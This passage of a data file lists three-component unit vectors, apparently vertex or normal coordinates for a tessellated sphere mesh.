[0.588087081909,-0.131048902869,0.798110127449],
[0.529480218887,-0.153434738517,0.834331154823],
[0.618283927441,-0.353819847107,0.701809465885],
[0.678621411324,-0.327040165663,0.657660841942],
[0.65135627985,-0.398910075426,0.645450055599],
[0.665048420429,-0.213841319084,0.715529501438],
[0.718357801437,-0.188148602843,0.669747889042],
[0.700865805149,-0.256401896477,0.665616393089],
[0.733673810959,-0.298754066229,0.610302150249],
[0.782811582088,-0.269586592913,0.560828924179],
[0.762617051601,-0.340069264174,0.550243675709],
[0.700865805149,-0.256401896477,0.665616393089],
[0.733673810959,-0.298754066229,0.610302150249],
[0.678621411324,-0.327040165663,0.657660841942],
[0.506734728813,-0.217834427953,0.834127128124],
[0.545040607452,-0.26241543889,0.796284377575],
[0.480284929276,-0.284414708614,0.829719662666],
[0.627150595188,-0.171839639544,0.759706020355],
[0.665048420429,-0.213841319084,0.715529501438],
[0.606988489628,-0.238753452897,0.757998526096],
[0.582528710365,-0.308011889458,0.752189457417],
[0.618283927441,-0.353819847107,0.701809465885],
[0.553625464439,-0.378517180681,0.74177056551],
[0.606988489628,-0.238753452897,0.757998526096],
[0.582528710365,-0.308011889458,0.752189457417],
[0.545040607452,-0.26241543889,0.796284377575],
[0.550243675709,-0.762617051601,0.340069264174],
[0.610302150249,-0.733673810959,0.298754066229],
[0.560828924179,-0.782811582088,0.269586592913],
[0.645450055599,-0.65135627985,0.398910075426],
[0.701809465885,-0.618283927441,0.353819847107],
[0.657660841942,-0.678621411324,0.327040165663],
[0.665616393089,-0.700865805149,0.256401896477],
[0.715529501438,-0.665048420429,0.213841319084],
[0.669747889042,-0.718357801437,0.188148602843],
[0.657660841942,-0.678621411324,0.327040165663],
[0.665616393089,-0.700865805149,0.256401896477],
[0.610302150249,-0.733673810959,0.298754066229],
[0.726413309574,-0.520354926586,0.44894811511],
[0.776785671711,-0.485873311758,0.400663375854],
[0.74177056551,-0.553625464439,0.378517180681],
[0.787004828453,-0.379529476166,0.486395716667],
[0.830415487289,-0.346611320972,0.436200261116],
[0.806385576725,-0.416404157877,0.419940322638],
[0.820587992668,-0.450116455555,0.352179646492],
[0.857896447182,-0.413926929235,0.3044308424],
[0.829719662666,-0.480284929276,0.284414708614],
[0.806385576725,-0.416404157877,0.419940322638],
[0.820587992668,-0.450116455555,0.352179646492],
[0.776785671711,-0.485873311758,0.400663375854],
[0.759706020355,-0.627150595188,0.171839639544],
[0.798110127449,-0.588087081909,0.131048902869],
[0.757922053337,-0.643326640129,0.108097285032],
[0.834127128124,-0.506734728813,0.217834427953],
[0.866019308567,-0.468421578407,0.174905076623],
[0.834331154823,-0.529480218887,0.153434738517],
[0.830952167511,-0.548688352108,0.091976031661],
[0.858619451523,-0.509656965733,0.0549761541188],
[0.82464236021,-0.564633131027,0.0339771322906],
[0.834331154823,-0.529480218887,0.153434738517],
[0.830952167511,-0.548688352108,0.091976031661],
[0.798110127449,-0.588087081909,0.131048902869],
[0.74177056551,-0.553625464439,0.378517180681],
[0.752189457417,-0.582528710365,0.308011889458],
[0.701809465885,-0.618283927441,0.353819847107],
[0.829719662666,-0.480284929276,0.284414708614],
[0.834127128124,-0.506734728813,0.217834427953],
[0.796284377575,-0.545040607452,0.26241543889],
[0.757998526096,-0.606988489628,0.238753452897],
[0.759706020355,-0.627150595188,0.171839639544],
[0.715529501438,-0.665048420429,0.213841319084],
[0.796284377575,-0.545040607452,0.26241543889],
[0.757998526096,-0.606988489628,0.238753452897],
[0.752189457417,-0.582528710365,0.308011889458],
[0.379529476166,-0.486395716667,0.787004828453],
[0.411682873964,-0.535965919495,0.737060189247],
[0.340069264174,-0.550243675709,0.762617051601],
[0.520354926586,-0.44894811511,0.726413309574],
[0.552667617798,-0.495975226164,0.669751524925],
[0.483050197363,-0.517854511738,0.706037700176],
[0.44230055809,-0.58378881216,0.680853009224],
[0.470621615648,-0.628728508949,0.619044244289],
[0.398910075426,-0.645450055599,0.65135627985],
[0.483050197363,-0.517854511738,0.706037700176],
[0.44230055809,-0.58378881216,0.680853009224],
[0.411682873964,-0.535965919495,0.737060189247],
[0.65135627985,-0.398910075426,0.645450055599],
[0.680853009224,-0.44230055809,0.58378881216],
[0.619044244289,-0.470621615648,0.628728508949],
[0.762617051601,-0.340069264174,0.550243675709],
[0.787004828453,-0.379529476166,0.486395716667],
[0.737060189247,-0.411682873964,0.535965919495],
[0.706037700176,-0.483050197363,0.517854511738],
[0.726413309574,-0.520354926586,0.44894811511],
[0.669751524925,-0.552667617798,0.495975226164],
[0.737060189247,-0.411682873964,0.535965919495],
[0.706037700176,-0.483050197363,0.517854511738],
[0.680853009224,-0.44230055809,0.58378881216],
[0.495975226164,-0.669751524925,0.552667617798],
[0.517854511738,-0.706037700176,0.483050197363],
[0.44894811511,-0.726413309574,0.520354926586],
[0.628728508949,-0.619044244289,0.470621615648],
[0.645450055599,-0.65135627985,0.398910075426],
[0.58378881216,-0.680853009224,0.44230055809],
[0.535965919495,-0.737060189247,0.411682873964],
[0.550243675709,-0.762617051601,0.340069264174],
[0.486395716667,-0.787004828453,0.379529476166],
[0.58378881216,-0.680853009224,0.44230055809],
[0.535965919495,-0.737060189247,0.411682873964],
[0.517854511738,-0.706037700176,0.483050197363],
[0.619044244289,-0.470621615648,0.628728508949],
[0.581951975822,-0.540649950504,0.607478022575],
[0.552667617798,-0.495975226164,0.669751524925],
[0.669751524925,-0.552667617798,0.495975226164],
[0.628728508949,-0.619044244289,0.470621615648],
[0.607478022575,-0.581951975822,0.540649950504],
[0.540649950504,-0.607478022575,0.581951975822],
[0.495975226164,-0.669751524925,0.552667617798],
[0.470621615648,-0.628728508949,0.619044244289],
[0.607478022575,-0.581951975822,0.540649950504],
[0.540649950504,-0.607478022575,0.581951975822],
[0.581951975822,-0.540649950504,0.607478022575],
[0.82464236021,-0.564633131027,-0.0339771322906],
[0.79582041502,-0.605532705784,0.0],
[0.82464236021,-0.564633131027,0.0339771322906],
[0.757922053337,-0.643326640129,-0.108097285032],
[0.722495436668,-0.687358558178,-0.0744211226702],
[0.761889100075,-0.646693944931,-0.0362210273743],
[0.761889100075,-0.646693944931,0.0362210273743],
[0.722495436668,-0.687358558178,0.0744211226702],
[0.757922053337,-0.643326640129,0.108097285032],
[0.761889100075,-0.646693944931,-0.0362210273743],
[0.761889100075,-0.646693944931,0.0362210273743],
[0.79582041502,-0.605532705784,0.0],
[0.669747889042,-0.718357801437,-0.188148602843],
[0.62687343359,-0.763553202152,-0.154971644282],
[0.677466154099,-0.726636230946,-0.114190116525],
[0.560828924179,-0.782811582088,-0.269586592913],
[0.510783493519,-0.826465010643,-0.236761152744],
[0.571085453033,-0.797127783298,-0.196083456278],
[0.578244268894,-0.807120084763,-0.119124859571],
[0.524005174637,-0.847858190536,-0.0809632539749],
[0.581926107407,-0.81225925684,-0.0399611219764],
[0.571085453033,-0.797127783298,-0.196083456278],
[0.578244268894,-0.807120084763,-0.119124859571],
[0.62687343359,-0.763553202152,-0.154971644282],
[0.677466154099,-0.726636230946,0.114190116525],
[0.62687343359,-0.763553202152,0.154971644282],
[0.669747889042,-0.718357801437,0.188148602843],
[0.581926107407,-0.81225925684,0.0399611219764],
[0.524005174637,-0.847858190536,0.0809632539749],
[0.578244268894,-0.807120084763,0.119124859571],
[0.571085453033,-0.797127783298,0.196083456278],
[0.510783493519,-0.826465010643,0.236761152744],
[0.560828924179,-0.782811582088,0.269586592913],
[0.578244268894,-0.807120084763,0.119124859571],
[0.571085453033,-0.797127783298,0.196083456278],
[0.62687343359,-0.763553202152,0.154971644282],
[0.677466154099,-0.726636230946,-0.114190116525],
[0.68142670393,-0.730884253979,-0.0382858961821],
[0.722495436668,-0.687358558178,-0.0744211226702],
[0.581926107407,-0.81225925684,-0.0399611219764],
[0.581926107407,-0.81225925684,0.0399611219764],
[0.634539365768,-0.772890508175,0.0],
[0.68142670393,-0.730884253979,0.0382858961821],
[0.677466154099,-0.726636230946,0.114190116525],
[0.722495436668,-0.687358558178,0.0744211226702],
[0.634539365768,-0.772890508175,0.0],
[0.68142670393,-0.730884253979,0.0382858961821],
[0.68142670393,-0.730884253979,-0.0382858961821],
[0.436200261116,-0.830415487289,-0.346611320972],
[0.380723625422,-0.869839549065,-0.313733518124],
[0.446935534477,-0.85085272789,-0.276221334934],
[0.3044308424,-0.857896447182,-0.413926929235],
[0.246351331472,-0.891307473183,-0.380633711815],
[0.313436716795,-0.883275330067,-0.348686188459],
[0.321246802807,-0.905284404755,-0.277958005667],
[0.258633822203,-0.935745954514,-0.239766731858],
[0.327503234148,-0.922915279865,-0.202408134937],
[0.313436716795,-0.883275330067,-0.348686188459],
[0.321246802807,-0.905284404755,-0.277958005667],
[0.380723625422,-0.869839549065,-0.313733518124],
[0.174905076623,-0.866019308567,-0.468421578407],
[0.117213711143,-0.892938017845,-0.434652328491],
[0.180623859167,-0.894335091114,-0.409316182137],
[0.0549761541188,-0.858619451523,-0.509656965733],
[0.0,-0.8796184659,-0.475679844618],
[0.0568443164229,-0.887796461582,-0.456712335348],
[0.0586068555713,-0.915323853493,-0.398431301117],
[0.0,-0.932827115059,-0.360324263573],
[0.0602079555392,-0.940329909325,-0.334895044565],
[0.0568443164229,-0.887796461582,-0.456712335348],
[0.0586068555713,-0.915323853493,-0.398431301117],
[0.117213711143,-0.892938017845,-0.434652328491],
[0.193975359201,-0.960443258286,-0.199805602431],
[0.128498718143,-0.978907585144,-0.158833146095],
[0.196501940489,-0.97295331955,-0.121444880962],
[0.0615878328681,-0.961880862713,-0.266443610191],
[0.0,-0.974178731441,-0.225778326392],
[0.0626873448491,-0.979053080082,-0.193714544177],
[0.0634539350867,-0.991025745869,-0.117650069296],
[0.0,-0.997029185295,-0.0770247355103],
[0.0638479366899,-0.997179210186,-0.0394601933658],
[0.0626873448491,-0.979053080082,-0.193714544177],
[0.0634539350867,-0.991025745869,-0.117650069296],
[0.128498718143,-0.978907585144,-0.158833146095],
[0.180623859167,-0.894335091114,-0.409316182137],
[0.185843646526,-0.920180141926,-0.34457308054],
[0.246351331472,-0.891307473183,-0.380633711815],
[0.0602079555392,-0.940329909325,-0.334895044565],
[0.0615878328681,-0.961880862713,-0.266443610191],
[0.123895764351,-0.943842172623,-0.306287169456],
[0.190361812711,-0.942551255226,-0.274516820908],
[0.193975359201,-0.960443258286,-0.199805602431],
[0.258633822203,-0.935745954514,-0.239766731858],
[0.123895764351,-0.943842172623,-0.306287169456],
[0.190361812711,-0.942551255226,-0.274516820908],
[0.185843646526,-0.920180141926,-0.34457308054],
[0.446935534477,-0.85085272789,0.276221334934],
[0.380723625422,-0.869839549065,0.313733518124],
[0.436200261116,-0.830415487289,0.346611320972],
[0.327503234148,-0.922915279865,0.202408134937],
[0.258633822203,-0.935745954514,0.239766731858],
[0.321246802807,-0.905284404755,0.277958005667],
[0.313436716795,-0.883275330067,0.348686188459],
[0.246351331472,-0.891307473183,0.380633711815],
[0.3044308424,-0.857896447182,0.413926929235],
[0.321246802807,-0.905284404755,0.277958005667],
[0.313436716795,-0.883275330067,0.348686188459],
[0.380723625422,-0.869839549065,0.313733518124],
[0.196501940489,-0.97295331955,0.121444880962],
[0.128498718143,-0.978907585144,0.158833146095],
[0.193975359201,-0.960443258286,0.199805602431],
[0.0638479366899,-0.997179210186,0.0394601933658],
[0.0,-0.997029185295,0.0770247355103],
[0.0634539350867,-0.991025745869,0.117650069296],
[0.0626873448491,-0.979053080082,0.193714544177],
[0.0,-0.974178731441,0.225778326392],
[0.0615878328681,-0.961880862713,0.266443610191],
[0.0634539350867,-0.991025745869,0.117650069296],
[0.0626873448491,-0.979053080082,0.193714544177],
[0.128498718143,-0.978907585144,0.158833146095],
[0.180623859167,-0.894335091114,0.409316182137],
[0.117213711143,-0.892938017845,0.434652328491],
[0.174905076623,-0.866019308567,0.468421578407],
[0.0602079555392,-0.940329909325,0.334895044565],
[0.0,-0.932827115059,0.360324263573],
[0.0586068555713,-0.915323853493,0.398431301117],
[0.0568443164229,-0.887796461582,0.456712335348],
[0.0,-0.8796184659,0.475679844618],
[0.0549761541188,-0.858619451523,0.509656965733],
[0.0586068555713,-0.915323853493,0.398431301117],
[0.0568443164229,-0.887796461582,0.456712335348],
[0.117213711143,-0.892938017845,0.434652328491],
[0.193975359201,-0.960443258286,0.199805602431],
[0.190361812711,-0.942551255226,0.274516820908],
[0.258633822203,-0.935745954514,0.239766731858],
[0.0615878328681,-0.961880862713,0.266443610191],
[0.0602079555392,-0.940329909325,0.334895044565],
[0.123895764351,-0.943842172623,0.306287169456],
[0.185843646526,-0.920180141926,0.34457308054],
[0.180623859167,-0.894335091114,0.409316182137],
[0.246351331472,-0.891307473183,0.380633711815],
[0.123895764351,-0.943842172623,0.306287169456],
[0.185843646526,-0.920180141926,0.34457308054],
[0.190361812711,-0.942551255226,0.274516820908],
[0.446935534477,-0.85085272789,-0.276221334934],
[0.455528259277,-0.867211103439,-0.20109423995],
[0.510783493519,-0.826465010643,-0.236761152744],
[0.327503234148,-0.922915279865,-0.202408134937],
[0.33188316226,-0.935258030891,-0.123069040477],
[0.395605653524,-0.903840482235,-0.162998497486],
[0.461539924145,-0.878655850887,-0.122248865664],
[0.464636415243,-0.88455080986,-0.0410230122507],
[0.524005174637,-0.847858190536,-0.0809632539749],
[0.395605653524,-0.903840482235,-0.162998497486],
[0.461539924145,-0.878655850887,-0.122248865664],
[0.455528259277,-0.867211103439,-0.20109423995],
[0.196501940489,-0.97295331955,-0.121444880962],
[0.197802826762,-0.979394435883,-0.0407496243715],
[0.265506535769,-0.960611641407,-0.0820460245013],
[0.0638479366899,-0.997179210186,-0.0394601933658],
[0.0638479366899,-0.997179210186,0.0394601933658],
[0.130150929093,-0.991494178772,0.0],
[0.197802826762,-0.979394435883,0.0407496243715],
[0.196501940489,-0.97295331955,0.121444880962],
[0.265506535769,-0.960611641407,0.0820460245013],
[0.130150929093,-0.991494178772,0.0],
[0.197802826762,-0.979394435883,0.0407496243715],
[0.197802826762,-0.979394435883,-0.0407496243715],
[0.464636415243,-0.88455080986,0.0410230122507],
[0.461539924145,-0.878655850887,0.122248865664],
[0.524005174637,-0.847858190536,0.0809632539749],
[0.33188316226,-0.935258030891,0.123069040477],
[0.327503234148,-0.922915279865,0.202408134937],
[0.395605653524,-0.903840482235,0.162998497486],
[0.455528259277,-0.867211103439,0.20109423995],
[0.446935534477,-0.85085272789,0.276221334934],
[0.510783493519,-0.826465010643,0.236761152744],
[0.395605653524,-0.903840482235,0.162998497486],
[0.455528259277,-0.867211103439,0.20109423995],
[0.461539924145,-0.878655850887,0.122248865664],
[0.265506535769,-0.960611641407,-0.0820460245013],
[0.334140062332,-0.941618084908,-0.04130198434],
[0.33188316226,-0.935258030891,-0.123069040477],
[0.265506535769,-0.960611641407,0.0820460245013],
[0.33188316226,-0.935258030891,0.123069040477],
[0.334140062332,-0.941618084908,0.04130198434],
[0.400968074799,-0.916092038155,0.0],
[0.464636415243,-0.88455080986,0.0410230122507],
[0.464636415243,-0.88455080986,-0.0410230122507],
[0.334140062332,-0.941618084908,0.04130198434],
[0.400968074799,-0.916092038155,0.0],
[0.334140062332,-0.941618084908,-0.04130198434],
[-0.82464236021,-0.564633131027,-0.0339771322906],
[-0.830952167511,-0.548688352108,-0.091976031661],
[-0.858619451523,-0.509656965733,-0.0549761541188],
[-0.757922053337,-0.643326640129,-0.108097285032],
[-0.759706020355,-0.627150595188,-0.171839639544],
[-0.798110127449,-0.588087081909,-0.131048902869],
[-0.834331154823,-0.529480218887,-0.153434738517],
[-0.834127128124,-0.506734728813,-0.217834427953],
[-0.866019308567,-0.468421578407,-0.174905076623],
[-0.798110127449,-0.588087081909,-0.131048902869],
[-0.834331154823,-0.529480218887,-0.153434738517],
[-0.830952167511,-0.548688352108,-0.091976031661],
[-0.669747889042,-0.718357801437,-0.188148602843],
[-0.665616393089,-0.700865805149,-0.256401896477],
[-0.715529501438,-0.665048420429,-0.213841319084],
[-0.560828924179,-0.782811582088,-0.269586592913],
[-0.550243675709,-0.762617051601,-0.340069264174],
[-0.610302150249,-0.733673810959,-0.298754066229],
[-0.657660841942,-0.678621411324,-0.327040165663],
[-0.645450055599,-0.65135627985,-0.398910075426],
[-0.701809465885,-0.618283927441,-0.353819847107],
[-0.610302150249,-0.733673810959,-0.298754066229],
[-0.657660841942,-0.678621411324,-0.327040165663],
[-0.665616393089,-0.700865805149,-0.256401896477],
[-0.829719662666,-0.480284929276,-0.284414708614],
[-0.820587992668,-0.450116455555,-0.352179646492],
[-0.857896447182,-0.413926929235,-0.3044308424],
[-0.74177056551,-0.553625464439,-0.378517180681],
[-0.726413309574,-0.520354926586,-0.44894811511],
[-0.776785671711,-0.485873311758,-0.400663375854],
[-0.806385576725,-0.416404157877,-0.419940322638],
[-0.787004828453,-0.379529476166,-0.486395716667],
[-0.830415487289,-0.346611320972,-0.436200261116],
[-0.776785671711,-0.485873311758,-0.400663375854],
[-0.806385576725,-0.416404157877,-0.419940322638],
[-0.820587992668,-0.450116455555,-0.352179646492],
[-0.715529501438,-0.665048420429,-0.213841319084],
[-0.757998526096,-0.606988489628,-0.238753452897],
[-0.759706020355,-0.627150595188,-0.171839639544],
[-0.701809465885,-0.618283927441,-0.353819847107],
[-0.74177056551,-0.553625464439,-0.378517180681],
[-0.752189457417,-0.582528710365,-0.308011889458],
[-0.796284377575,-0.545040607452,-0.26241543889],
[-0.829719662666,-0.480284929276,-0.284414708614],
[-0.834127128124,-0.506734728813,-0.217834427953],
[-0.752189457417,-0.582528710365,-0.308011889458],
[-0.796284377575,-0.545040607452,-0.26241543889],
[-0.757998526096,-0.606988489628,-0.238753452897],
[-0.436200261116,-0.830415487289,-0.346611320972],
[-0.419940322638,-0.806385576725,-0.416404157877],
[-0.486395716667,-0.787004828453,-0.379529476166],
[-0.3044308424,-0.857896447182,-0.413926929235],
[-0.284414708614,-0.829719662666,-0.480284929276],
[-0.352179646492,-0.820587992668,-0.450116455555],
[-0.400663375854,-0.776785671711,-0.485873311758],
[-0.378517180681,-0.74177056551,-0.553625464439],
[-0.44894811511,-0.726413309574,-0.520354926586],
[-0.352179646492,-0.820587992668,-0.450116455555],
[-0.400663375854,-0.776785671711,-0.485873311758],
[-0.419940322638,-0.806385576725,-0.416404157877],
[-0.174905076623,-0.866019308567,-0.468421578407],
[-0.153434738517,-0.834331154823,-0.529480218887],
[-0.217834427953,-0.834127128124,-0.506734728813],
[-0.0549761541188,-0.858619451523,-0.509656965733],
[-0.0339771322906,-0.82464236021,-0.564633131027],
[-0.091976031661,-0.830952167511,-0.548688352108],
[-0.131048902869,-0.798110127449,-0.588087081909],
[-0.108097285032,-0.757922053337,-0.643326640129],
[-0.171839639544,-0.759706020355,-0.627150595188],
[-0.091976031661,-0.830952167511,-0.548688352108],
[-0.131048902869,-0.798110127449,-0.588087081909],
[-0.153434738517,-0.834331154823,-0.529480218887],
[-0.353819847107,-0.701809465885,-0.618283927441],
[-0.327040165663,-0.657660841942,-0.678621411324],
[-0.398910075426,-0.645450055599,-0.65135627985],
[-0.213841319084,-0.715529501438,-0.665048420429],
[-0.188148602843,-0.669747889042,-0.718357801437],
[-0.256401896477,-0.665616393089,-0.700865805149],
[-0.298754066229,-0.610302150249,-0.733673810959],
[-0.269586592913,-0.560828924179,-0.782811582088],
[-0.340069264174,-0.550243675709,-0.762617051601],
[-0.256401896477,-0.665616393089,-0.700865805149],
[-0.298754066229,-0.610302150249,-0.733673810959],
[-0.327040165663,-0.657660841942,-0.678621411324],
[-0.217834427953,-0.834127128124,-0.506734728813],
[-0.26241543889,-0.796284377575,-0.545040607452],
[-0.284414708614,-0.829719662666,-0.480284929276],
[-0.171839639544,-0.759706020355,-0.627150595188],
[-0.213841319084,-0.715529501438,-0.665048420429],
[-0.238753452897,-0.757998526096,-0.606988489628],
[-0.308011889458,-0.752189457417,-0.582528710365],
[-0.353819847107,-0.701809465885,-0.618283927441],
[-0.378517180681,-0.74177056551,-0.553625464439],
[-0.238753452897,-0.757998526096,-0.606988489628],
[-0.308011889458,-0.752189457417,-0.582528710365],
[-0.26241543889,-0.796284377575,-0.545040607452],
[-0.762617051601,-0.340069264174,-0.550243675709],
[-0.733673810959,-0.298754066229,-0.610302150249],
[-0.782811582088,-0.269586592913,-0.560828924179],
[-0.65135627985,-0.398910075426,-0.645450055599],
[-0.618283927441,-0.353819847107,-0.701809465885],
[-0.678621411324,-0.327040165663,-0.657660841942],
[-0.700865805149,-0.256401896477,-0.665616393089],
[-0.665048420429,-0.213841319084,-0.715529501438],
[-0.718357801437,-0.188148602843,-0.669747889042],
[-0.678621411324,-0.327040165663,-0.657660841942],
[-0.700865805149,-0.256401896477,-0.665616393089],
[-0.733673810959,-0.298754066229,-0.610302150249],
[-0.520354926586,-0.44894811511,-0.726413309574],
[-0.485873311758,-0.400663375854,-0.776785671711],
[-0.553625464439,-0.378517180681,-0.74177056551],
[-0.379529476166,-0.486395716667,-0.787004828453],
[-0.346611320972,-0.436200261116,-0.830415487289],
[-0.416404157877,-0.419940322638,-0.806385576725],
[-0.450116455555,-0.352179646492,-0.820587992668],
[-0.413926929235,-0.3044308424,-0.857896447182],
[-0.480284929276,-0.284414708614,-0.829719662666],
[-0.416404157877,-0.419940322638,-0.806385576725],
[-0.450116455555,-0.352179646492,-0.820587992668],
[-0.485873311758,-0.400663375854,-0.776785671711],
[-0.627150595188,-0.171839639544,-0.759706020355],
[-0.588087081909,-0.131048902869,-0.798110127449],
[-0.643326640129,-0.108097285032,-0.757922053337],
[-0.506734728813,-0.217834427953,-0.834127128124],
[-0.468421578407,-0.174905076623,-0.866019308567],
[-0.529480218887,-0.153434738517,-0.834331154823],
[-0.548688352108,-0.091976031661,-0.830952167511],
[-0.509656965733,-0.0549761541188,-0.858619451523],
[-0.564633131027,-0.0339771322906,-0.82464236021],
[-0.529480218887,-0.153434738517,-0.834331154823],
[-0.548688352108,-0.091976031661,-0.830952167511],
[-0.588087081909,-0.131048902869,-0.798110127449],
[-0.553625464439,-0.378517180681,-0.74177056551],
[-0.582528710365,-0.308011889458,-0.752189457417],
[-0.618283927441,-0.353819847107,-0.701809465885],
[-0.480284929276,-0.284414708614,-0.829719662666],
[-0.506734728813,-0.217834427953,-0.834127128124],
[-0.545040607452,-0.26241543889,-0.796284377575],
[-0.606988489628,-0.238753452897,-0.757998526096],
[-0.627150595188,-0.171839639544,-0.759706020355],
[-0.665048420429,-0.213841319084,-0.715529501438],
[-0.545040607452,-0.26241543889,-0.796284377575],
[-0.606988489628,-0.238753452897,-0.757998526096],
[-0.582528710365,-0.308011889458,-0.752189457417],
[-0.486395716667,-0.787004828453,-0.379529476166],
[-0.535965919495,-0.737060189247,-0.411682873964],
[-0.550243675709,-0.762617051601,-0.340069264174],
[-0.44894811511,-0.726413309574,-0.520354926586],
[-0.495975226164,-0.669751524925,-0.552667617798],
[-0.517854511738,-0.706037700176,-0.483050197363],
[-0.58378881216,-0.680853009224,-0.44230055809],
[-0.628728508949,-0.619044244289,-0.470621615648],
[-0.645450055599,-0.65135627985,-0.398910075426],
[-0.517854511738,-0.706037700176,-0.483050197363],
[-0.58378881216,-0.680853009224,-0.44230055809],
[-0.535965919495,-0.737060189247,-0.411682873964],
[-0.398910075426,-0.645450055599,-0.65135627985],
[-0.44230055809,-0.58378881216,-0.680853009224],
[-0.470621615648,-0.628728508949,-0.619044244289],
[-0.340069264174,-0.550243675709,-0.762617051601],
[-0.379529476166,-0.486395716667,-0.787004828453],
[-0.411682873964,-0.535965919495,-0.737060189247],
[-0.483050197363,-0.517854511738,-0.706037700176],
[-0.520354926586,-0.44894811511,-0.726413309574],
[-0.552667617798,-0.495975226164,-0.669751524925],
[-0.411682873964,-0.535965919495,-0.737060189247],
[-0.483050197363,-0.517854511738,-0.706037700176],
[-0.44230055809,-0.58378881216,-0.680853009224],
[-0.669751524925,-0.552667617798,-0.495975226164],
[-0.706037700176,-0.483050197363,-0.517854511738],
[-0.726413309574,-0.520354926586,-0.44894811511],
[-0.619044244289,-0.470621615648,-0.628728508949],
[-0.65135627985,-0.398910075426,-0.645450055599],
[-0.680853009224,-0.44230055809,-0.58378881216],
[-0.737060189247,-0.411682873964,-0.535965919495],
[-0.762617051601,-0.340069264174,-0.550243675709],
[-0.787004828453,-0.379529476166,-0.486395716667],
[-0.680853009224,-0.44230055809,-0.58378881216],
[-0.737060189247,-0.411682873964,-0.535965919495],
[-0.706037700176,-0.483050197363,-0.517854511738],
[-0.470621615648,-0.628728508949,-0.619044244289],
[-0.540649950504,-0.607478022575,-0.581951975822],
[-0.495975226164,-0.669751524925,-0.552667617798],
[-0.552667617798,-0.495975226164,-0.669751524925],
[-0.619044244289,-0.470621615648,-0.628728508949],
[-0.581951975822,-0.540649950504,-0.607478022575],
[-0.607478022575,-0.581951975822,-0.540649950504],
[-0.669751524925,-0.552667617798,-0.495975226164],
[-0.628728508949,-0.619044244289,-0.470621615648],
[-0.581951975822,-0.540649950504,-0.607478022575],
[-0.607478022575,-0.581951975822,-0.540649950504],
[-0.540649950504,-0.607478022575,-0.581951975822],
[0.0549761541188,-0.858619451523,-0.509656965733],
[0.091976031661,-0.830952167511,-0.548688352108],
[0.0339771322906,-0.82464236021,-0.564633131027],
[0.174905076623,-0.866019308567,-0.468421578407],
[0.217834427953,-0.834127128124,-0.506734728813],
[0.153434738517,-0.834331154823,-0.529480218887],
[0.131048902869,-0.798110127449,-0.588087081909],
[0.171839639544,-0.759706020355,-0.627150595188],
[0.108097285032,-0.757922053337,-0.643326640129],
[0.153434738517,-0.834331154823,-0.529480218887],
[0.131048902869,-0.798110127449,-0.588087081909],
[0.091976031661,-0.830952167511,-0.548688352108],
[0.3044308424,-0.857896447182,-0.413926929235],
[0.352179646492,-0.820587992668,-0.450116455555],
[0.284414708614,-0.829719662666,-0.480284929276],
[0.436200261116,-0.830415487289,-0.346611320972],
[0.486395716667,-0.787004828453,-0.379529476166],
[0.419940322638,-0.806385576725,-0.416404157877],
[0.400663375854,-0.776785671711,-0.485873311758],
[0.44894811511,-0.726413309574,-0.520354926586],
[0.378517180681,-0.74177056551,-0.553625464439],
[0.419940322638,-0.806385576725,-0.416404157877],
[0.400663375854,-0.776785671711,-0.485873311758],
[0.352179646492,-0.820587992668,-0.450116455555],
[0.213841319084,-0.715529501438,-0.665048420429],
[0.256401896477,-0.665616393089,-0.700865805149],
[0.188148602843,-0.669747889042,-0.718357801437],
[0.353819847107,-0.701809465885,-0.618283927441],
[0.398910075426,-0.645450055599,-0.65135627985],
[0.327040165663,-0.657660841942,-0.678621411324],
[0.298754066229,-0.610302150249,-0.733673810959],
[0.340069264174,-0.550243675709,-0.762617051601],
[0.269586592913,-0.560828924179,-0.782811582088],
[0.327040165663,-0.657660841942,-0.678621411324],
[0.298754066229,-0.610302150249,-0.733673810959],
[0.256401896477,-0.665616393089,-0.700865805149],
[0.284414708614,-0.829719662666,-0.480284929276],
[0.26241543889,-0.796284377575,-0.545040607452],
[0.217834427953,-0.834127128124,-0.506734728813],
[0.378517180681,-0.74177056551,-0.553625464439],
[0.353819847107,-0.701809465885,-0.618283927441],
[0.308011889458,-0.752189457417,-0.582528710365],
[0.238753452897,-0.757998526096,-0.606988489628],
[0.213841319084,-0.715529501438,-0.665048420429],
[0.171839639544,-0.759706020355,-0.627150595188],
[0.308011889458,-0.752189457417,-0.582528710365],
[0.238753452897,-0.757998526096,-0.606988489628],
[0.26241543889,-0.796284377575,-0.545040607452],
[0.560828924179,-0.782811582088,-0.269586592913],
[0.610302150249,-0.733673810959,-0.298754066229],
[0.550243675709,-0.762617051601,-0.340069264174],
[0.669747889042,-0.718357801437,-0.188148602843],
[0.715529501438,-0.665048420429,-0.213841319084],
[0.665616393089,-0.700865805149,-0.256401896477],
[0.657660841942,-0.678621411324,-0.327040165663],
[0.701809465885,-0.618283927441,-0.353819847107],
[0.645450055599,-0.65135627985,-0.398910075426],
[0.665616393089,-0.700865805149,-0.256401896477],
[0.657660841942,-0.678621411324,-0.327040165663],
[0.610302150249,-0.733673810959,-0.298754066229],
[0.757922053337,-0.643326640129,-0.108097285032],
[0.798110127449,-0.588087081909,-0.131048902869],
[0.759706020355,-0.627150595188,-0.171839639544],
[0.82464236021,-0.564633131027,-0.0339771322906],
[0.858619451523,-0.509656965733,-0.0549761541188],
[0.830952167511,-0.548688352108,-0.091976031661],
[0.834331154823,-0.529480218887,-0.153434738517],
[0.866019308567,-0.468421578407,-0.174905076623],
[0.834127128124,-0.506734728813,-0.217834427953],
[0.830952167511,-0.548688352108,-0.091976031661],
[0.834331154823,-0.529480218887,-0.153434738517],
[0.798110127449,-0.588087081909,-0.131048902869],
[0.74177056551,-0.553625464439,-0.378517180681],
[0.776785671711,-0.485873311758,-0.400663375854],
[0.726413309574,-0.520354926586,-0.44894811511],
[0.829719662666,-0.480284929276,-0.284414708614],
[0.857896447182,-0.413926929235,-0.3044308424],
[0.820587992668,-0.450116455555,-0.352179646492],
[0.806385576725,-0.416404157877,-0.419940322638],
[0.830415487289,-0.346611320972,-0.436200261116],
[0.787004828453,-0.379529476166,-0.486395716667],
[0.820587992668,-0.450116455555,-0.352179646492],
[0.806385576725,-0.416404157877,-0.419940322638],
[0.776785671711,-0.485873311758,-0.400663375854],
[0.759706020355,-0.627150595188,-0.171839639544],
[0.757998526096,-0.606988489628,-0.238753452897],
[0.715529501438,-0.665048420429,-0.213841319084],
[0.834127128124,-0.506734728813,-0.217834427953],
[0.829719662666,-0.480284929276,-0.284414708614],
[0.796284377575,-0.545040607452,-0.26241543889],
[0.752189457417,-0.582528710365,-0.308011889458],
[0.74177056551,-0.553625464439,-0.378517180681],
[0.701809465885,-0.618283927441,-0.353819847107],
